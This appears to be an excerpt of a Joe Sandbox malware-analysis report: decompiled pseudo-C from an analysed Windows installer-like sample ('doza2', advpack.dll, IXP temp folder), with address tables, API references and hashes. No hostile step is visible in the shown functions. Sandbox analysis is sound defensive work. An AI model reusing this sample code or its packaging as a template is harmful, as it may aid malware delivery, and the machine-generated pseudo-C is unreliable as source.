							_v436 = E00962A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00962A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x968a38 & 0x00000001;
											if(( *0x968a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0096681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E009667C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E009628E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x969a40 = _t119;
						 *0x968184 = 1;
						 *0x968180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x969a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x968184 = _t135;
							 *0x968180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E009644B9(0, _t138);
					L66:
					return E00966CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                    0x009636f9
                                                                                                                                                                                                                                    0x00963700
                                                                                                                                                                                                                                    0x0096370c
                                                                                                                                                                                                                                    0x00963716
                                                                                                                                                                                                                                    0x00963718
                                                                                                                                                                                                                                    0x0096371b
                                                                                                                                                                                                                                    0x00963721
                                                                                                                                                                                                                                    0x0096372b
                                                                                                                                                                                                                                    0x0096373d
                                                                                                                                                                                                                                    0x00963745
                                                                                                                                                                                                                                    0x00963746
                                                                                                                                                                                                                                    0x00963746
                                                                                                                                                                                                                                    0x00963749
                                                                                                                                                                                                                                    0x009637ab
                                                                                                                                                                                                                                    0x009637ad
                                                                                                                                                                                                                                    0x009637ae
                                                                                                                                                                                                                                    0x009637b3
                                                                                                                                                                                                                                    0x009637b8
                                                                                                                                                                                                                                    0x009637b8
                                                                                                                                                                                                                                    0x009637bf
                                                                                                                                                                                                                                    0x009637bf
                                                                                                                                                                                                                                    0x009637c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009637cb
                                                                                                                                                                                                                                    0x009637cd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009637d5
                                                                                                                                                                                                                                    0x009637db
                                                                                                                                                                                                                                    0x009637e8
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637f0
                                                                                                                                                                                                                                    0x009637f6
                                                                                                                                                                                                                                    0x00963805
                                                                                                                                                                                                                                    0x00963817
                                                                                                                                                                                                                                    0x0096382b
                                                                                                                                                                                                                                    0x00963830
                                                                                                                                                                                                                                    0x00963836
                                                                                                                                                                                                                                    0x0096383b
                                                                                                                                                                                                                                    0x0096383d
                                                                                                                                                                                                                                    0x009638eb
                                                                                                                                                                                                                                    0x009638eb
                                                                                                                                                                                                                                    0x009638f2
                                                                                                                                                                                                                                    0x0096390c
                                                                                                                                                                                                                                    0x00963911
                                                                                                                                                                                                                                    0x00963911
                                                                                                                                                                                                                                    0x00963913
                                                                                                                                                                                                                                    0x0096394d
                                                                                                                                                                                                                                    0x0096394d
                                                                                                                                                                                                                                    0x0096394f
                                                                                                                                                                                                                                    0x009638a9
                                                                                                                                                                                                                                    0x009638a9
                                                                                                                                                                                                                                    0x009638b0
                                                                                                                                                                                                                                    0x009638b2
                                                                                                                                                                                                                                    0x009638b9
                                                                                                                                                                                                                                    0x009638bb
                                                                                                                                                                                                                                    0x009638c1
                                                                                                                                                                                                                                    0x00963975
                                                                                                                                                                                                                                    0x009638c7
                                                                                                                                                                                                                                    0x009638de
                                                                                                                                                                                                                                    0x009638e0
                                                                                                                                                                                                                                    0x009638e0
                                                                                                                                                                                                                                    0x0096397b
                                                                                                                                                                                                                                    0x0096397d
                                                                                                                                                                                                                                    0x009639a9
                                                                                                                                                                                                                                    0x0096397f
                                                                                                                                                                                                                                    0x00963982
                                                                                                                                                                                                                                    0x0096398b
                                                                                                                                                                                                                                    0x0096398d
                                                                                                                                                                                                                                    0x0096398f
                                                                                                                                                                                                                                    0x0096399f
                                                                                                                                                                                                                                    0x009639a1
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x0096398f
                                                                                                                                                                                                                                    0x009639af
                                                                                                                                                                                                                                    0x009639b6
                                                                                                                                                                                                                                    0x00963a0f
                                                                                                                                                                                                                                    0x00963a0f
                                                                                                                                                                                                                                    0x00963a11
                                                                                                                                                                                                                                    0x00963a13
                                                                                                                                                                                                                                    0x00963a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639b8
                                                                                                                                                                                                                                    0x009639b8
                                                                                                                                                                                                                                    0x009639ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639bc
                                                                                                                                                                                                                                    0x009639bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639c3
                                                                                                                                                                                                                                    0x009639c9
                                                                                                                                                                                                                                    0x009639ce
                                                                                                                                                                                                                                    0x009639d0
                                                                                                                                                                                                                                    0x009639e3
                                                                                                                                                                                                                                    0x009639e5
                                                                                                                                                                                                                                    0x009639e6
                                                                                                                                                                                                                                    0x009639f1
                                                                                                                                                                                                                                    0x009639f7
                                                                                                                                                                                                                                    0x009639fa
                                                                                                                                                                                                                                    0x00963a01
                                                                                                                                                                                                                                    0x00963a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963a06
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x00963a0b
                                                                                                                                                                                                                                    0x00963a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x009639fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639fc
                                                                                                                                                                                                                                    0x009639d3
                                                                                                                                                                                                                                    0x009639d8
                                                                                                                                                                                                                                    0x009639da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639dc
                                                                                                                                                                                                                                    0x009639b6
                                                                                                                                                                                                                                    0x00963955
                                                                                                                                                                                                                                    0x0096395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963961
                                                                                                                                                                                                                                    0x00963963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00963915
                                                                                                                                                                                                                                    0x00963915
                                                                                                                                                                                                                                    0x0096391b
                                                                                                                                                                                                                                    0x0096391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096392d
                                                                                                                                                                                                                                    0x00963933
                                                                                                                                                                                                                                    0x00963938
                                                                                                                                                                                                                                    0x0096393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963940
                                                                                                                                                                                                                                    0x00963946
                                                                                                                                                                                                                                    0x0096394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009638f2
                                                                                                                                                                                                                                    0x00963843
                                                                                                                                                                                                                                    0x00963845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096384b
                                                                                                                                                                                                                                    0x0096384d
                                                                                                                                                                                                                                    0x00963883
                                                                                                                                                                                                                                    0x00963885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096389a
                                                                                                                                                                                                                                    0x0096389e
                                                                                                                                                                                                                                    0x0096389e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009638a0
                                                                                                                                                                                                                                    0x009638a0
                                                                                                                                                                                                                                    0x009638a2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009638a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009638a4
                                                                                                                                                                                                                                    0x0096384f
                                                                                                                                                                                                                                    0x00963851
                                                                                                                                                                                                                                    0x00963857
                                                                                                                                                                                                                                    0x0096386e
                                                                                                                                                                                                                                    0x00963877
                                                                                                                                                                                                                                    0x0096387b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963881
                                                                                                                                                                                                                                    0x00963859
                                                                                                                                                                                                                                    0x0096385c
                                                                                                                                                                                                                                    0x00963862
                                                                                                                                                                                                                                    0x00963866
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009638f4
                                                                                                                                                                                                                                    0x009638f4
                                                                                                                                                                                                                                    0x009638f5
                                                                                                                                                                                                                                    0x009638fb
                                                                                                                                                                                                                                    0x00963901
                                                                                                                                                                                                                                    0x00963901
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096390a
                                                                                                                                                                                                                                    0x0096374b
                                                                                                                                                                                                                                    0x0096374e
                                                                                                                                                                                                                                    0x0096375c
                                                                                                                                                                                                                                    0x00963764
                                                                                                                                                                                                                                    0x00963769
                                                                                                                                                                                                                                    0x0096376e
                                                                                                                                                                                                                                    0x00963771
                                                                                                                                                                                                                                    0x0096379c
                                                                                                                                                                                                                                    0x0096379f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009637a3
                                                                                                                                                                                                                                    0x009637a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009637a4
                                                                                                                                                                                                                                    0x00963773
                                                                                                                                                                                                                                    0x00963777
                                                                                                                                                                                                                                    0x00963778
                                                                                                                                                                                                                                    0x0096377f
                                                                                                                                                                                                                                    0x00963781
                                                                                                                                                                                                                                    0x0096378e
                                                                                                                                                                                                                                    0x0096378e
                                                                                                                                                                                                                                    0x00963794
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963794
                                                                                                                                                                                                                                    0x00963783
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963785
                                                                                                                                                                                                                                    0x0096378c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096378c
                                                                                                                                                                                                                                    0x00963750
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096372d
                                                                                                                                                                                                                                    0x0096372d
                                                                                                                                                                                                                                    0x0096396b
                                                                                                                                                                                                                                    0x0096396b
                                                                                                                                                                                                                                    0x0096396c
                                                                                                                                                                                                                                    0x0096396e
                                                                                                                                                                                                                                    0x0096396f
                                                                                                                                                                                                                                    0x00963a1e
                                                                                                                                                                                                                                    0x00963a1e
                                                                                                                                                                                                                                    0x00963a22
                                                                                                                                                                                                                                    0x00963a27
                                                                                                                                                                                                                                    0x00963a3e
                                                                                                                                                                                                                                    0x00963a3e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00963723
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 009639C3
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 009639F1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                                                    • String ID: 3$doza2
                                                                                                                                                                                                                                    • API String ID: 2519184315-2054879145
                                                                                                                                                                                                                                    • Opcode ID: 69b905c7ad5a51ba2f44fd17905e2eb148f1e04b98d0e626b91efcafca78dc1e
                                                                                                                                                                                                                                    • Instruction ID: 4f1df7ecc0e1c02553c9237b47b2bdf300868cff17d90aed49dbbda6118a4f91
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69b905c7ad5a51ba2f44fd17905e2eb148f1e04b98d0e626b91efcafca78dc1e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F9103B1A152249BEB348F65CD807EA73B8EB81304F1581A9D889DB291DB748F81DF01
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E00966495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x968004; // 0xf4cc89a0
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00961781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E0096658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00966CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                    0x00966495
                                                                                                                                                                                                                                    0x00966495
                                                                                                                                                                                                                                    0x009664a0
                                                                                                                                                                                                                                    0x009664a7
                                                                                                                                                                                                                                    0x009664ab
                                                                                                                                                                                                                                    0x009664bd
                                                                                                                                                                                                                                    0x009664c2
                                                                                                                                                                                                                                    0x009664d3
                                                                                                                                                                                                                                    0x009664df
                                                                                                                                                                                                                                    0x009664e8
                                                                                                                                                                                                                                    0x00966502
                                                                                                                                                                                                                                    0x009664ee
                                                                                                                                                                                                                                    0x009664f9
                                                                                                                                                                                                                                    0x009664f9
                                                                                                                                                                                                                                    0x00966516

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 009664DF
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 009664F9
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00966502
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                    • API String ID: 438848745-179718922
                                                                                                                                                                                                                                    • Opcode ID: 83db5060ada9837cd8d84b6af5834e449bd378c204e601334dc4d570e290771e
                                                                                                                                                                                                                                    • Instruction ID: ff25ed004963b936dc314ab24e940949c95225f7c487b01311ea0f8fd37129e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83db5060ada9837cd8d84b6af5834e449bd378c204e601334dc4d570e290771e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B001F930918108ABD760DB64DC46FEE737CDB92314F500199F586A31C0DFB09E85DB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009628E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E009628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00962773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00962A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00962A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                    0x009628f1
                                                                                                                                                                                                                                    0x009628f4
                                                                                                                                                                                                                                    0x009628f7
                                                                                                                                                                                                                                    0x009628f9
                                                                                                                                                                                                                                    0x009628fc
                                                                                                                                                                                                                                    0x009628ff
                                                                                                                                                                                                                                    0x00962901
                                                                                                                                                                                                                                    0x00962907
                                                                                                                                                                                                                                    0x00962a62
                                                                                                                                                                                                                                    0x00962a64
                                                                                                                                                                                                                                    0x0096290d
                                                                                                                                                                                                                                    0x0096290d
                                                                                                                                                                                                                                    0x0096290f
                                                                                                                                                                                                                                    0x00962912
                                                                                                                                                                                                                                    0x00962920
                                                                                                                                                                                                                                    0x00962937
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962944
                                                                                                                                                                                                                                    0x0096294a
                                                                                                                                                                                                                                    0x0096294f
                                                                                                                                                                                                                                    0x00962a2f
                                                                                                                                                                                                                                    0x00962a32
                                                                                                                                                                                                                                    0x00962a34
                                                                                                                                                                                                                                    0x00962a37
                                                                                                                                                                                                                                    0x00962a41
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962955
                                                                                                                                                                                                                                    0x0096295e
                                                                                                                                                                                                                                    0x00962962
                                                                                                                                                                                                                                    0x00962969
                                                                                                                                                                                                                                    0x0096296f
                                                                                                                                                                                                                                    0x00962974
                                                                                                                                                                                                                                    0x0096298c
                                                                                                                                                                                                                                    0x00962a20
                                                                                                                                                                                                                                    0x00962a21
                                                                                                                                                                                                                                    0x00962a27
                                                                                                                                                                                                                                    0x00962a4c
                                                                                                                                                                                                                                    0x00962a4f
                                                                                                                                                                                                                                    0x00962a50
                                                                                                                                                                                                                                    0x00962a53
                                                                                                                                                                                                                                    0x00962a56
                                                                                                                                                                                                                                    0x00962a5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009629b2
                                                                                                                                                                                                                                    0x009629b2
                                                                                                                                                                                                                                    0x009629b5
                                                                                                                                                                                                                                    0x009629bd
                                                                                                                                                                                                                                    0x009629c3
                                                                                                                                                                                                                                    0x009629cc
                                                                                                                                                                                                                                    0x009629d5
                                                                                                                                                                                                                                    0x009629d7
                                                                                                                                                                                                                                    0x009629da
                                                                                                                                                                                                                                    0x009629dd
                                                                                                                                                                                                                                    0x009629df
                                                                                                                                                                                                                                    0x009629ec
                                                                                                                                                                                                                                    0x009629f8
                                                                                                                                                                                                                                    0x009629fc
                                                                                                                                                                                                                                    0x009629ff
                                                                                                                                                                                                                                    0x00962a02
                                                                                                                                                                                                                                    0x00962a07
                                                                                                                                                                                                                                    0x00962a0a
                                                                                                                                                                                                                                    0x00962a0f
                                                                                                                                                                                                                                    0x00962a19
                                                                                                                                                                                                                                    0x00962a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962a0f
                                                                                                                                                                                                                                    0x0096298c
                                                                                                                                                                                                                                    0x00962974
                                                                                                                                                                                                                                    0x00962962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096294f
